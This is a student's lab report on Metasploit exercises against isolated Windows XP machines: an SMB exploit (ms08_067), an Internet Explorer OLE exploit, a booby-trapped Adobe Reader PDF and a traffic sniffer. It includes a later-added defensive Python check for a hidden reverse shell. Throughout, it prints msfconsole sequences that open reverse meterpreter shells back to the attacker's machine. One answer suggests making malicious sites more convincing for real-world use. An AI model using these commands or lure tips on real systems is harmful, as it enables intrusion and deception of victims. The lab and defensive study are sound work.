2017-2018-2 20155315 "Network Countermeasure Technology" Exp5: MSF Basic Application

Purpose

Learn to use Metasploit for simple attack operations (tutorial)

Experimental content

Metasploit has six kinds of modules:

  • Penetration attack modules (Exploit Modules)
  • Auxiliary modules (Auxiliary Modules)
  • Payload modules (Payload Modules)
  • No-op modules (Nop Modules)
  • Encoder modules (Encoders)
  • Post-exploitation modules (Post)
  • This experiment used exploit and auxiliary.
  • exploit : the penetration attack module, which exploits a specific vulnerability to attack the target host. "Penetration" means that the attacker injects his own malicious code into the target host's system through a vulnerability on that host, like termites slowly eating through an entire building from a single hole.
  • auxiliary : the auxiliary module, which helps penetration testers collect rich intelligence about the target system before launching the penetration attack, so that the attack can be more targeted and precise. The relationship between it and exploit is like that between an observer and a sniper: the former observes the network environment and obtains accurate information; the latter attacks based on the collected information.

Experimental procedure

(1) An active attack practice, such as ms08_067

The main principle of the MS08_067 attack is that the attacker uses the SMB service port 445, which is open by default on the victim host, sends malicious data to this port, calls a function of the Server service through the MSRPC interface, and corrupts the program's stack buffer to obtain remote code execution permissions and fully control the host.

  • lab environment
    computer       system                                  IP address
    host           Kali                                    192.168.19.130
    target drone   Windows XP SP3 English (AlwaysOn NX)    192.168.19.132
  • Open msfconsole, set the payload and parameters, and run:

    use exploit/windows/smb/ms08_067_netapi
    set payload generic/shell_reverse_tcp
    set RHOST 192.168.19.132              // IP address of the target machine
    set LHOST 192.168.19.130              // IP address of the local (attacking) machine
    set LPORT 5315
    exploit
  • At first I set target 10; after reading the tutorial I decided to use set target 0, which lets kali identify the target machine's system automatically, so the attack has a higher success rate.
  • result
  • Let's see what program the malicious data is disguised as.
  • Reset the payload with set payload windows/meterpreter/reverse_tcp; after exploit, use getpid to get the process ID of our disguised process.
  • Use ps -ef | grep 1064 to view the process.
  • Through the analysis of the last experiment, we know that Svchost.exe is the general host process name of the service running from the dynamic link library (DLL). This program is very important to the normal operation of the system and cannot be terminated. That is to say, our attack is hidden under the system program, which is still very scary to think about.
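A defender-side check added here (not part of the original lab report) to show how the observation above can be turned around: a payload hiding inside svchost.exe still has to keep a TCP connection back to the listener (192.168.19.130:5315 in this lab), so cross-referencing a process list with the connection table exposes it. The tasklist and netstat listings are constructed samples, and the port allowlist is an assumption for this lab.

```python
# Defensive cross-check for the observation above: a payload hiding in
# svchost.exe still needs a TCP connection back to the listener
# (192.168.19.130:5315 in this lab). Sample listings below are constructed.
# Constructed 'tasklist'-style listing (image name, PID).
TASKLIST = """\
System Idle Process            0
svchost.exe                  844
svchost.exe                 1064
"""
# Constructed 'netstat -ano'-style listing from the XP target.
NETSTAT = """\
  TCP    192.168.19.132:139    0.0.0.0:0              LISTENING       4
  TCP    192.168.19.132:1039   192.168.19.130:5315    ESTABLISHED     1064
  TCP    192.168.19.132:1041   192.168.19.130:445     ESTABLISHED     844
"""

# Remote ports svchost.exe is expected to use (assumption for this lab;
# tune per environment): DNS, HTTP/HTTPS, RPC, NetBIOS, SMB.
ALLOWED_REMOTE_PORTS = {53, 80, 135, 139, 443, 445}
SYSTEM_IMAGES = {"svchost.exe", "lsass.exe", "services.exe"}

def parse_tasklist(text):
    """Map PID -> lower-cased image name from tasklist-style lines."""
    pids = {}
    for line in text.splitlines():
        parts = line.rsplit(None, 1)
        if len(parts) == 2 and parts[1].isdigit():
            pids[int(parts[1])] = parts[0].lower()
    return pids

def parse_netstat(text):
    """Yield (remote_host, remote_port, state, pid) for each TCP row."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[0] == "TCP":
            rhost, rport = parts[2].rsplit(":", 1)
            yield rhost, int(rport), parts[3], int(parts[4])

def suspicious_connections(tasklist=TASKLIST, netstat=NETSTAT,
                           allowed=ALLOWED_REMOTE_PORTS):
    """Return (pid, image, 'host:port') for system images holding an
    ESTABLISHED connection to a remote port outside the allowlist."""
    names = parse_tasklist(tasklist)
    hits = []
    for rhost, rport, state, pid in parse_netstat(netstat):
        image = names.get(pid, "?")
        if state == "ESTABLISHED" and image in SYSTEM_IMAGES and rport not in allowed:
            hits.append((pid, image, f"{rhost}:{rport}"))
    return hits
```

The svchost.exe instance talking to port 445 is left alone while the one holding the reverse shell on port 5315 is reported.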

(2) An attack against the browser, such as ms14_064

  • lab environment
    • Internet Explorer 8
    computer       system            IP address
    host           Kali              192.168.19.130
    target drone   Windows XP SP3    192.168.19.131
  • At first, when using the attack from the tutorial, the ms11_050 process was always killed by Data Execution Prevention. Lowering the IE browser's security level to the lowest setting did not help, and further attempts with ms03_020, ms12_037 and ms13_009 were also unsuccessful.
  • I searched again for exploits targeting IE, filtered by date and rank, and finally selected windows/browser/ms14_064_ole_code_execution

    Microsoft Windows OLE Remote Code Execution Vulnerability. OLE (Object Linking and Embedding) is a technology that allows applications to share data and functionality; a remote attacker can exploit this vulnerability to execute arbitrary code through a crafted website. It affects all versions from Win95+IE3 to Win10+IE11.

  • It looks like this vulnerability should work in one shot on Windows XP.
  • use windows/browser/ms14_064_ole_code_execution and look at the parameters that need to be set
  • Set the payload and parameters, and run:

    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.19.130             
    set LPORT 2015
    set URIPATH zyl_
  • result
  • The target machine opens the IE browser and enters the generated URL; port 8080 on kali, which is listening, receives the connection and establishes a session
  • open session

(3) An attack against the client, such as Adobe

  • lab environment
    • Adobe Reader 9.3
    computer       system            IP address
    host           Kali              192.168.19.130
    target drone   Windows XP SP3    192.168.19.131
  • The vulnerability used in this experiment is exploit/windows/browser/adobe_cooltype_sing

    This vulnerability affects Adobe Reader versions prior to 9.3.4: a buffer overflow caused by a parameter named uniqueName in a SING table object

  • Set the payload and parameters, and run:

    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.19.130             
    set LPORT 5315
    set FILENAME 20155315
    exploit
  • result
  • Start the listener (handler) module:

    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.19.130             
    set LPORT 1111
  • Copy the generated malicious file to the target machine. After running, kali shows that the connection is successful.

(4) Attacks of Application Auxiliary Modules

    computer       system            IP address
    host           Kali              192.168.19.130
    target drone   Windows XP SP3    192.168.19.131
  • Enter the /usr/share/metasploit-framework/modules/auxiliary directory to see what is available
  • Here we see an interesting one, sniffer, which is a network sniffer.
  • Enter the directory and find that there is only one file, psnuffle.rb
  • In msfconsole, use auxiliary/sniffer/psnuffle and view its details
  • You can see that it sniffs any protocol, the capture length is 65535, and the time limit is 500 s
  • run; open Baidu on the target machine, and kali captured this conversation

Problems encountered in the experiment

  • When I did the first experiment, I suspected that port 445 of the target machine was not open. After setting it up according to the online tutorial, I opened cmd to check port 445 and ran exploit again, and the connection was successful.
  • When doing the second experiment, the target machine's data execution protection mechanism kept blocking the web page from opening.
  • As far as the experiment goes, the IE browser or Data Execution Prevention can recognize the older vulnerabilities, but if patches for newer vulnerabilities are not installed, the target machine's port is like a crack in a window: once the malicious website is opened, the attacker can break into the target machine effortlessly.

Lab question answers

  • Explain what is exploit, payload, encode in your own words.
    • Exploit means implanting one's own malicious code into the target host through a small loophole to achieve the goal of the attack; it refers to a means of attack.
    • The payload is equivalent to a piece of malicious code, or a container holding malicious code, through which the target host can be controlled.
    • Encode refers to an encoder, which encapsulates or disguises the malicious code through encoding so that the target host does not detect it as malware.

What skills or steps are still missing for real-world use?

  • The prerequisite for real-world use is having enough accurate information, that is, the information collection in the early stage should be more comprehensive and thorough.
  • In this experiment, the target machines were mostly operated by hand to trigger the malicious code so that the attacker's intrusion would succeed. In real life, suspicious files, suspicious URLs and so on will not be clicked voluntarily. Therefore, for real-world use it is best to edit the malicious website further or change the domain name to improve the chance of success.

Experimental summary

This experiment went relatively smoothly. When the attack succeeded it felt great, but there is still some distance from real-world use. In addition, every time I do an experiment I feel deeply that the Internet is really too insecure. There are so many capable people out there, so it is still necessary to protect one's computer!
